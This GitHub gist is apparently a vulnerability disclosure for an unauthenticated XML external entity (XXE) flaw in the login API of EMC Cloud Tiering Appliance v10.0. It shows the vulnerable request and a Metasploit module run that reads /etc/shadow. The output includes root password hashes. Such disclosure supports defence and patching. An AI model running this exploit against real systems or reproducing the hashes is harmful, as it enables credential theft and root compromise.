Last active
August 29, 2015 13:57
-
-
Save brandonprry/9895721 to your computer and use it in GitHub Desktop.
EMC CTA unauthed XXE with root perms
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| EMC Cloud Tiering Appliance v10.0 Unauthed XXE | |
| The following authentication request is susceptible to an XXE attack: | |
| POST /api/login HTTP/1.1 | |
| Host: 172.31.16.99 | |
| User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Cookie: JSESSIONID=12818F1AC5C744CF444B2683ABF6E8AC | |
| Connection: keep-alive | |
| Referer: https://172.31.16.99/UxFramework/UxFlashApplication.swf | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 213 | |
| <Request> | |
| <Username>root</Username> | |
| <Password>114,97,105,110</Password> | |
| </Request> | |
| ------------------------------- | |
| Quick run: | |
| msf auxiliary(emc_cta_xxe) > show options | |
| Module options (auxiliary/gather/emc_cta_xxe): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| FILEPATH /etc/shadow yes The filepath to read on the server | |
| Proxies http:127.0.0.1:8080 no Use a proxy chain | |
| RHOST 172.31.16.99 yes The target address | |
| RPORT 443 yes The target port | |
| TARGETURI / yes Base directory path | |
| VHOST no HTTP server virtual host | |
| msf auxiliary(emc_cta_xxe) > run | |
| [+] File saved to: /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt | |
| [*] Auxiliary module execution completed | |
| msf auxiliary(emc_cta_xxe) > cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt | |
| [*] exec: cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt | |
| root:u4sA.C2vNqNF.:15913:::::: | |
| bin:*:15913:0:99999:0:0:: | |
| daemon:*:15913:0:99999:0:0:: | |
| lp:*:15913:0:99999:0:0:: | |
| mail:*:15913:0:99999:0:0:: | |
| news:*:15913:0:99999:0:0:: | |
| uucp:*:15913:0:99999:0:0:: | |
| man:*:15913:0:99999:0:0:: | |
| wwwrun:*:15913:0:99999:0:0:: | |
| ftp:*:15913:0:99999:0:0:: | |
| nobody:*:15913:0:99999:0:0:: | |
| messagebus:*:15913:0:99999:0:0:: | |
| polkituser:*:15913:0:99999:0:0:: | |
| haldaemon:*:15913:0:99999:0:0:: | |
| sshd:*:15913:0:99999:0:0:: | |
| uuidd:*:15913:0:99999:0:0:: | |
| postgres:*:15913:0:99999:0:0:: | |
| ntp:*:15913:0:99999:0:0:: | |
| suse-ncc:*:15913:0:99999:0:0:: | |
| super:u4sA.C2vNqNF.:15913:0:99999:0:0:: | |
| msf auxiliary(emc_cta_xxe) > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment